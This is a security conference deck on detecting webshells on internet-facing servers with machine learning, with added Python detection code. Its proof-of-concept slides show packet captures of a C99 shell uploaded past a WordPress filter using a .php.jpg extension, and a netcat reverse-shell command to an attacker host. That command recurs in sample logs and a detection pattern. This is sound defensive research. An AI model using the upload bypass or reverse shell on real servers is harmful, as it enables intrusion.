Detection of webshells in compromised perimeter assets using ML algorithms
1. Detecting Webshells in Compromised Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh
2. $Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary of the board of Hackmiami. He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, BSides and has also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive hacking tournament series.
Joseph Zadeh studied mathematics in college and received a BS from the University of California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operations Center focused on security and network performance baselines, and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal focused on cyber security analytics and was also part of Kaiser Permanente's first cyber security R&D team.
4. The Perimeter
A network perimeter is the boundary between the private and locally managed-and-owned side of a network and the public and usually provider-managed side of a network.*
5. What Are Perimeter Assets?
Perimeter assets are the infrastructure and application items that are exposed to the internet or WAN. This may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc.)
- Yes… Cloud assets are also part of the perimeter as long as they have a link, connection, shared credentials or access from within the organization.
6. Perimeter Assets: First Line Of Defense
Logically, perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0-days (e.g., Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, which is reactive and passive
- 3rd party risks (Forgotten/Shared/Co-located, Unpatched, Unsecured APIs)
7. Perimeter Assets Can Become Unexpected Back Doors
Or more like a front door.... As they are exposed to the entire world, it is possible to begin a campaign by attacking network perimeter assets and from there work your way into the organization.
Consider this… Most organizations nowadays only expose 80 or 443, so it is logical that web servers are prime targets, as well as other internet-delivered services such as: MAIL, CMS, CRM, Dev, Storage, etc.
8. Do you think they might use the same credentials internally? Maybe mail clients? Storage?
9. Why Use A Webshell
- Stealth, compact multi-functional tool
- Leverages the programming language used in the web application (PHP, Java, ASP, etc.)
- Obfuscates commands so they appear as “web traffic”
- Covert channel using SSL/TLS
11. What Is A Webshell
“A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.” (US-CERT)
14. Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-qaeda webshell)
- Weevely (Terminal-like webshell, very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell
15. Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python, Perl)
- Encoding/Encryption
16. Webshells Can Provide Further Access
- Many times an attacker will place a webshell and then proceed to gain further access. Some common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc.)
- Footprinting the internal network
- Local root/system exploits
17. How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or configuration weaknesses, including:
- Cross-Site Scripting
- SQL Injection
- Vulnerabilities in applications/services (e.g., WordPress or other CMS applications)
- File processing vulnerabilities (e.g., upload filtering or assigned permissions)
- Remote File Include (RFI) and Local File Include (LFI) vulnerabilities
- Exposed Admin Interfaces (possible areas to find the vulnerabilities mentioned above)
*US-CERT
18. Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBoss vulnerability (CVE-2010-0738 / CVE-2013-4810) at exposed web server.
- Upload webshell (jbossinvoker, zecmd, cmd, etc.)
- JBoss running high on privs? No problem
- JBoss with low privs: upload local root/system exploit
- Windows box? upload PsExec (PowerShell now works on *nix as well)
- Distribute ransomware (SamSam), run Mimikatz? (PTH, PTT)
20. Layered ML
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models, rules and statistics to move past traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOCs and intelligence along with the fusion of ML models to build a central-nervous-system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
21-24. Use Case: Webshell on DMZ Asset, ML Evidence Fusion
Attack step -> ML security use case
- Exploit JBoss vulnerability (CVE-2010-0738 / CVE-2013-4810) at exposed web server -> Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion)
- Attacker uploads lightweight webshell on compromised server (jbossinvoker, zecmd, cmd, etc.) -> Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group
- Beachhead established and trust relationship exploited from DMZ to LAN asset using in-memory malware -> Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity
- Domain Controller is attacked and LDAP directory and credential hashes exfiltrated -> AD Tree model detects admin credentials performing an out-of-band sequence of behavior
29. Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection Method. In Proceedings of the 2017 International Conference on Cryptography, Security and Privacy (ICCSP '17). ACM, New York, NY, USA, 66-70. DOI: https://doi.org/10.1145/3058060.3058083
• Ye Fei, Gong Jian, Yang Wang. Black Box Detection of Webshell Based on Support Vector Machine. School of Computer Science and Technology, Southeast University; Key Laboratory of Computer Network Technology of Jiangsu Province: http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
32. How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised perimeter assets.
• Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior (Dynamic + Static Content)
• Local Feature Vector answers questions like: How many times do users take a similar path on the webserver? How rare is the path a user is browsing, from a statistics perspective?
• Global Feature Vector answers questions like: How often does this webserver communicate with DMZ IPs? Is there a trust relationship that has changed?
35. How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths (diagram of asset-to-asset paths; !! marks the rare ones):
- U->S
- S->U !!
- U->U (LAN to LAN)
- S->S (DMZ to LAN) !!
Diagram nodes: Desktop, Server, Desktop, Laptop (LAN assets) and DMZ Server.
38. Seeing the Analytic In Action
Once the identity resolution/learning process is complete we create new anomalies based on new paths/actions that are rare for a particular population profile.
(Diagram: lightweight webshell in the DMZ.)
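As an added example (not from the deck), the peer-group path rarity that slides 35 and 38 describe, in Python: assets are classified into U/S and LAN/DMZ from a constructed subnet inventory, a baseline of summarised flows gives each population profile a distribution over destination classes, and new flows whose path is rare for their source's profile are flagged. The IP ranges, flow counts and the 2% threshold are assumptions.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed asset inventory (assumption, not from the deck): U = user endpoint, S = server.
ASSET_CLASSES = {
    ipaddress.ip_network("10.1.0.0/24"): "U@LAN",   # desktops and laptops
    ipaddress.ip_network("10.2.0.0/24"): "S@LAN",   # internal servers (AD, file, database)
    ipaddress.ip_network("192.0.2.0/24"): "S@DMZ",  # internet-facing web servers
}

def classify(ip):
    """Map an address to its population profile (role@zone); anything unknown is external."""
    addr = ipaddress.ip_address(ip)
    for net, cls in ASSET_CLASSES.items():
        if addr in net:
            return cls
    return "EXT"

# Constructed baseline: one week of connection logs summarised as (src, dst, number of flows).
BASELINE_FLOWS = [
    ("10.1.0.15", "10.2.0.5", 900), ("10.1.0.22", "10.2.0.5", 850), ("10.1.0.30", "10.2.0.7", 700),
    ("10.1.0.15", "192.0.2.10", 300), ("10.1.0.22", "192.0.2.10", 250),   # users browse the DMZ web tier
    ("10.2.0.5", "10.2.0.7", 400), ("10.2.0.7", "10.2.0.5", 380),          # server to server inside the LAN
    ("192.0.2.10", "192.0.2.11", 200), ("192.0.2.10", "10.2.0.9", 4),       # DMZ to LAN: seen, but very rare
]

class PeerGroupPathModel:
    """Global stats: how often does each population profile talk to each destination class?"""
    def __init__(self):
        self.paths = defaultdict(Counter)   # source class -> Counter(destination class)

    def fit(self, flows):
        for src, dst, n in flows:
            self.paths[classify(src)][classify(dst)] += n
        return self

    def share(self, src, dst):
        """Fraction of the source peer group's traffic that takes this src->dst path (0.0 if never seen)."""
        group = self.paths.get(classify(src), Counter())
        total = sum(group.values())
        return group[classify(dst)] / total if total else 0.0

    def anomalies(self, flows, max_share=0.02):
        """Flows whose path is rare for the source's peer group, with the path label and its share."""
        out = []
        for src, dst in flows:
            s = self.share(src, dst)
            if s < max_share:
                out.append((src, dst, f"{classify(src)}->{classify(dst)}", round(s, 4)))
        return out

# Constructed new flows to score: normal user browsing plus the DMZ->LAN and S->U paths slide 35 marks with !!
NEW_FLOWS = [
    ("10.1.0.15", "10.2.0.5"),      # U->S, normal
    ("10.1.0.30", "192.0.2.10"),    # U->S (DMZ web tier), normal
    ("192.0.2.10", "10.2.0.5"),     # S->S, a DMZ web server reaching an internal server
    ("192.0.2.10", "10.1.0.22"),    # S->U from the DMZ, never seen in the baseline
    ("10.2.0.5", "10.1.0.15"),      # S->U inside the LAN, never seen in the baseline
]

if __name__ == "__main__":
    model = PeerGroupPathModel().fit(BASELINE_FLOWS)
    for hit in model.anomalies(NEW_FLOWS):
        print(hit)
```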
39. How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example, we can look at the sequence of requests for a fixed (IP/User, Web server) pair. We can use Bro logs, web server logs and perimeter traffic as well, as long as we have visibility into the application layer.
By determining these sequences we can discern between benign behavior and sequences of behaviors that indicate webshell-like activity.
41. How do we Detect Webshells Using ML: Local Stats
Using machine learning techniques we can compute and build up statistics around some key data points. In the context of this particular vector we can use rare means / low frequency counts for a fixed website:
- Rare time of site usage
- Rare timestamping and creation of files
- Rare connection patterns, large number of POST/GET requests to a specific file
- Connection strings with command arguments (cmd.exe, /bin/bash, nc)
- Unusual direct connections to files exposed to the internet
- Unusual User-Agent compared with the normal traffic patterns of users visiting the website or search engines indexing the site
42. Webshell detection POC/Example
For the proof of concept we gathered data on benign, normal browsing behavior and then replicated an RFI (Remote File Inclusion) attack uploading a C99 webshell to the target host. In this particular sequence of referrer items it can be seen how the attacker is browsing around the site, possibly footprinting and searching for input fields.
43. Webshell detection POC/Example
The referrer sample sequence below shows browsing around the victim web site:
- Referer: http://victimdomain/wordpress/?p=9
- Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
- Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5
Further review of referrers shows access to the WordPress login and admin area:
- Referer: http://victimdomain/wordpress/wp-login.php
- Referer: http://victimdomain/wordpress/wp-admin/
44. Webshell POC/Example
The following sequence shows the attacker accessing the post feature and uploading a C99 shell, bypassing sanitization controls by adding a .jpg extension to the actual shell “c9920161.php”. This is done by abusing the new post feature, which includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80:
Flags [P.], seq 13419:14264, ack 145980, win 4096,
options [nop,nop,TS val 787343940 ecr 195280],
length 845: HTTP: GET /wordpress/wp-content/plugins
/a-gallery/timthumb.php?src=http://victimdomain/
wordpress/wp-content/uploads/2016/06/c992016.php.
jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress
/wp-content/plugins/a-gallery/timthumb.php?src=http
://victimdomain/wordpress/wp-content/uploads
/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
45. Webshell detection POC/Example
Referer: http://victimdomain/wordpress/wp-admin/post-new.php (this is where the web shell is uploaded)
Finally, looking at the referrer sequence below, it can be seen how the attacker browses to the web shell; the frequency of access is a signal of operator behavior in the sequential component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
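As an added example (not part of the deck), the sequential component described on slides 39 and 43-45 in Python: a first-order transition model over normalized request paths is learned from constructed benign sessions of one (client, web server) pair, then scores the attacker's referrer chain from slide 45. The benign sessions, the path normalization and the smoothing constant are assumptions; the attacker sequence is the one on the slide, followed by repeated hits on the uploaded file.

```python
import math
from collections import Counter, defaultdict
from urllib.parse import urlsplit

START = "<start>"
UPLOADS = "/wp-content/uploads/"

def normalize(url):
    """Collapse a request URL or referrer into a path 'state': drop the query string and, under
    wp-content/uploads, replace numeric directories and file names with placeholders while keeping
    the full extension chain, so c9920161.php.jpg -> <file>.php.jpg but photo.jpg -> <file>.jpg."""
    path = urlsplit(url).path
    if UPLOADS not in path:
        return path
    base, rest = path.split(UPLOADS, 1)
    parts = rest.split("/")
    out = []
    for i, part in enumerate(parts):
        if part == "":
            out.append("")                       # trailing slash: a directory listing request
        elif i < len(parts) - 1:
            out.append("<dir>" if part.isdigit() else part)
        else:
            name, dot, ext = part.partition(".")
            out.append("<file>" + dot + ext)
    return base + UPLOADS + "/".join(out)

class PathSequenceModel:
    """First-order Markov model over path states with additive smoothing."""
    def __init__(self, alpha=0.5):
        self.alpha = alpha
        self.trans = defaultdict(Counter)   # previous state -> Counter(next state)
        self.states = set()

    def fit(self, sessions):
        for session in sessions:
            prev = START
            for url in session:
                cur = normalize(url)
                self.trans[prev][cur] += 1
                self.states.add(cur)
                prev = cur
        return self

    def prob(self, prev, cur):
        row = self.trans.get(prev, Counter())
        vocab = len(self.states) + 1            # +1 keeps probability mass for never-seen states
        return (row[cur] + self.alpha) / (sum(row.values()) + self.alpha * vocab)

    def score(self, session):
        """Return (mean surprisal in bits per request, transitions never seen in the baseline)."""
        prev, bits, unseen = START, 0.0, []
        for url in session:
            cur = normalize(url)
            if self.trans.get(prev, Counter())[cur] == 0 and (prev, cur) not in unseen:
                unseen.append((prev, cur))
            bits -= math.log2(self.prob(prev, cur))
            prev = cur
        return bits / max(len(session), 1), unseen

V = "http://victimdomain/wordpress"
# Constructed benign sessions (assumption): visitors reading a post with its stylesheets and images,
# plus an editor who logs in, writes a post and views it.
BENIGN_SESSIONS = [
    [f"{V}/", f"{V}/?p=9", f"{V}/wp-content/themes/default/style.css",
     f"{V}/wp-content/uploads/2016/05/header.jpg"],
    [f"{V}/?p=9", f"{V}/wp-content/themes/default/style.css",
     f"{V}/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5",
     f"{V}/wp-content/uploads/2016/05/photo.jpg"],
    [f"{V}/?p=9", f"{V}/wp-content/themes/default/style.css",
     f"{V}/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5",
     f"{V}/wp-login.php", f"{V}/wp-admin/", f"{V}/wp-admin/post-new.php",
     f"{V}/?p=14", f"{V}/wp-content/uploads/2016/06/photo2.jpg"],
]
HELD_OUT_BENIGN = [f"{V}/", f"{V}/?p=14", f"{V}/wp-content/themes/default/style.css",
                   f"{V}/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5",
                   f"{V}/wp-content/uploads/2016/05/banner.jpg"]
# The referrer chain from slides 43-45, then repeated requests to the uploaded shell.
ATTACK_SESSION = [
    f"{V}/?p=9", f"{V}/wp-content/themes/default/style.css",
    f"{V}/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5",
    f"{V}/wp-login.php", f"{V}/wp-admin/", f"{V}/wp-admin/post-new.php", f"{V}/?p=13",
    f"{V}/wp-content/uploads/", f"{V}/wp-content/uploads/2016/", f"{V}/wp-content/uploads/2016/06/",
    f"{V}/wp-content/uploads/2016/06/c9920161.php.jpg",
    f"{V}/wp-content/uploads/2016/06/c9920161.php.jpg",
    f"{V}/wp-content/uploads/2016/06/c9920161.php.jpg",
]

if __name__ == "__main__":
    model = PathSequenceModel().fit(BENIGN_SESSIONS)
    print("benign held-out:", model.score(HELD_OUT_BENIGN))
    print("attacker:", model.score(ATTACK_SESSION))
```

The login and post-new steps score as normal because the editor baseline contains them; what stands out is the walk down the uploads directory listings and the repeated hits on one uploaded file, which no benign session ever produced.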
46. Webshell detection POC/Example
In the following packet capture snippet it can be seen how the attacker uses netcat to send a reverse shell, utilizing the C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80:
Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:
HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P
.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e
=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=
cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2
Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
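As an added example (not the deck's own code), the local-stats indicators from slide 41 run over constructed Apache combined-format log lines that mimic the POC on slides 44-46: a double-extension upload fetched through timthumb, a netcat command in the request arguments, repeated requests to that one uploaded file, and an unusual User-Agent. Python; the log lines, regexes, weights and thresholds are assumptions, and the per-client score fuses the indicators in the spirit of slide 20.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (assumption, not the deck's capture): four ordinary visitors
# and a crawler, then a client that fetches c9920161.php.jpg through timthumb, passes a netcat command
# in the query string and keeps POSTing to the file.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2016:00:10:01 +0000] "GET /wordpress/?p=9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/47.0"
10.0.0.5 - - [10/Jun/2016:00:10:02 +0000] "GET /wordpress/wp-content/themes/default/style.css HTTP/1.1" 200 812 "http://victimdomain/wordpress/?p=9" "Mozilla/5.0 (Windows NT 10.0) Firefox/47.0"
10.0.0.6 - - [10/Jun/2016:00:10:40 +0000] "GET /wordpress/?p=9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/47.0"
10.0.0.7 - - [10/Jun/2016:00:11:30 +0000] "GET /wordpress/?p=13 HTTP/1.1" 200 4800 "-" "Mozilla/5.0 (Macintosh) Safari/601.7"
10.0.0.8 - - [10/Jun/2016:00:11:31 +0000] "GET /wordpress/wp-content/uploads/2016/05/photo.jpg HTTP/1.1" 200 90112 "http://victimdomain/wordpress/?p=13" "Mozilla/5.0 (Macintosh) Safari/601.7"
66.249.66.1 - - [10/Jun/2016:00:12:00 +0000] "GET /wordpress/?p=13 HTTP/1.1" 200 4800 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
203.0.113.9 - - [10/Jun/2016:00:28:39 +0000] "GET /wordpress/wp-content/plugins/a-gallery/timthumb.php?src=http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1" 200 300 "http://victimdomain/wordpress/wp-admin/post-new.php" "Mozilla/5.0 (X11; Linux x86_64) Chrome/51.0"
203.0.113.9 - - [10/Jun/2016:00:33:26 +0000] "GET /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg?act=cmd&cmd=nc+-e+%2Fbin%2Fbash+203.0.113.9+9999&submit=Execute HTTP/1.1" 200 2048 "http://victimdomain/wordpress/wp-content/uploads/2016/06/" "python-requests/2.10.0"
203.0.113.9 - - [10/Jun/2016:00:33:40 +0000] "POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1" 200 2048 "http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg" "python-requests/2.10.0"
203.0.113.9 - - [10/Jun/2016:00:33:55 +0000] "POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1" 200 2048 "http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg" "python-requests/2.10.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Slide 41: connection strings with command arguments (cmd.exe, /bin/bash, nc).
CMD_RE = re.compile(r'cmd\.exe|/bin/(?:ba)?sh|(?:^|[\s;|&`])(?:nc|ncat|netcat)(?:\s|$)')
# Slide 44: a server-side script extension hidden behind an innocuous one (c9920161.php.jpg).
DOUBLE_EXT_RE = re.compile(r'\.(?:php\d?|phtml|asp|aspx|jsp)\.[a-z0-9]{2,4}$', re.I)

def parse_line(line):
    """Parse one combined-format line into a dict with the path and the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec

def _as_path(value):
    try:
        return urlsplit(value).path
    except ValueError:                 # malformed URL in a parameter: treat the raw value as a path
        return value

def score_clients(log_text, repeat_threshold=3, min_clients_for_ua=4):
    """Fuse slide 41's indicators per client IP into (score, [reasons]); the weights are assumptions."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    clients = {r["ip"] for r in records}
    hits = Counter((r["ip"], r["path"]) for r in records)      # requests per (client, file)
    path_total = Counter(r["path"] for r in records)            # requests per file from everyone
    ua_clients = defaultdict(set)
    evidence = defaultdict(dict)                                # ip -> {reason: weight}, deduplicated
    for r in records:
        ip = r["ip"]
        ua_clients[r["ua"]].add(ip)
        if CMD_RE.search(" ".join(v for _, v in r["params"])):
            evidence[ip][f"command argument in request to {r['path']}"] = 3
        for name in [r["path"]] + [_as_path(v) for _, v in r["params"]]:
            if DOUBLE_EXT_RE.search(name):
                evidence[ip][f"double extension {name.rsplit('/', 1)[-1]}"] = 2
    for (ip, path), n in hits.items():
        # one client accounting for every request to a file, repeatedly: direct access, not a page load
        if n >= repeat_threshold and n == path_total[path]:
            evidence[ip][f"{n} direct requests to {path}, no other client"] = 2
    if len(clients) >= min_clients_for_ua:
        for ua, ips in ua_clients.items():
            if len(ips) == 1:
                evidence[next(iter(ips))][f"user agent seen from one client only: {ua}"] = 1
    return {ip: (sum(ev.values()), sorted(ev)) for ip, ev in evidence.items()}

def alerts(log_text, min_score=3):
    """Client IPs whose fused score reaches the alert threshold (a single weak indicator does not)."""
    return sorted(ip for ip, (score, _) in score_clients(log_text).items() if score >= min_score)

if __name__ == "__main__":
    for ip, (score, reasons) in score_clients(SAMPLE_LOG).items():
        print(ip, score, reasons)
    print("alerts:", alerts(SAMPLE_LOG))
```

The crawler's rare User-Agent alone scores 1 and stays below the alert line, while the attacking client accumulates every indicator; command arguments carried in a POST body (as in the capture above) are not in a web server access log and need proxy or Bro visibility, as slide 39 notes.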
48. Effective Webshell Detection via Machine Learning
• Webshell ML Detection Paradigm
• Two models of behavior: Local Behavior and Global Asset Behavior
• Local behavior is further broken down into an individual history per path in a webserver. The webserver model is maintained as two separate individual graphs, one for dynamic content and one for static content
• Feature vectors for the local content and path anomalies on a per-webserver basis are then correlated with global asset path behaviors.
49. Conclusion
- Machine learning & big data technologies enhance detection beyond simple static signature-based defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls, Bro, Web Gateway, etc.).
- Detection mechanisms can also be enhanced and extended by covering any other measurable attack vector that delivers a web shell payload (SQLi, XSS, other types of RFI, etc.).
56. Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component
Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection
57. Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-Ordered” Component
Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations
Per user/IP/account/…
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median
3. Anything that keeps track of global state
4. Machine Learning Computations
58-59. Step 4: Build an ML Model for each important sub-behavior
Each model can be batch, real-time or hybrid mode
61-64. Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model ready?
1. When should we re-train?
2. How should new data be weighted over old data?
3. How do we know when a model is ready?
66. Real Time Identity Resolution (architecture diagram)
Data sources: DHCP, IMS/IPAM, FW, Proxy, VPN, AD -> Distributed ETL -> Data Ingest
Real Time Layer: Sequential Models and IOCs
Batch Layer: Large Scale Models and Non-Sequential IOCs
Hybrid View (Batch + Real Time)
Identity lookup shown in the diagram (the first non-null of user name, hostname and IP becomes the username):
Username = select coalesce(user_name, hostname, IP) from Active_ID_Table where IP = '10.10.100.23'
Active_ID_Table sample rows:
IP            DHCP.MAC            DHCP_Lasteventtime    AD_FQDN
10.100.1.23   58:5c:35:c3:6e:a4   2014-03-11T14:00:00   joe.eng.acme.com
10.13.11.221  12:3a:74:b2:6a:22   2014-03-12T14:30:00   ad.hr.acme.com
Editor's Notes
Context: shades of grey is a good thing. People in security tend to think black and white -> rules are brittle.
Shades of grey is good: Machine Learning
Defend as
Layered security strategy
Examples of where certain kinds of behavior won't conform to a rule. How sequencing a bunch of small indicators and
Evidence from small heterogeneous:
Black and white is good -> you are not transacting in black
Rules
Statistics
Humans
Simple question I use to assess the security posture of large enterprises: how easily can they answer this question: ”For every network request in our network can we determine the individual process on the host that generated the request”
Evidence from small heterogeneous:
100 files -> is not bad because it has not triggered the 10GB rule yet
Peer group -> never moves more than 10 files
VPN session -> comes from a small geolocation
Weaving a whole story based on the